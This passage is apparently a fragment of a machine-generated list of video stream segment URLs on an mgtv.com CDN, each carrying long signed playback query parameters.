efbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/283F635A138A17CAA26946C85C5A36C7_830080_840080_801_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F827462B3F93B701723D1025AB7B0E92_840080_850080_2180_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F5CA3FFC1062A95A4E843AF79F5396C1_850080_860080_1380_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2C18A768E47FCB41607A81B9DA904D53_860080_870080_677_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0C21C6C4D1DBAC14671F68F54EFC1F94_870080_880080_773_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/906F8CBF3EA039D51E6AE6469E8B07EE_880080_890080_1610_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/69EFC4D9886B3216B0530E97D1A749A5_890080_900080_974_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/EA7C482D4B187F3D9964DF1EEFB60491_900080_910080_915_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E4DCD677952DF775536BA7C62020F73D_910080_920080_622_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F8B55361FE2232F4EA653D0FCAB3ADE4_920080_930080_474_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/5DF9857B322A337FE92B74E6F2176568_930080_940080_1386_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A0A1EB30B632077EEE65A2129F2441B3_940080_950080_1247_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D3AB5AF39C957AFF90C82AA9B6B90C27_950080_960080_889_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/202718C8199545118AB538F6391ACE6C_960080_970080_491_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4D96BB73F2C33A3473C921F644083960_970080_980080_488_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/67ECFC2CBBC3D1D540569C8AC46F3DB0_980080_990080_1469_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7C80C3D81FFC18CCFEE3927E476D906C_990080_1000080_2127_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F07F06180FD7C8047E749290FF6287D1_1000080_1010080_938_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/2B0544D8277741F37443E078D61F8D42_1010080_1020080_1634_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0B1F1DF109541F06CC5D0AB72A2E07E6_1020080_1030080_1527_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/95988C3D60046E864AA28CA3B89B678C_1030080_1040080_1396_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC4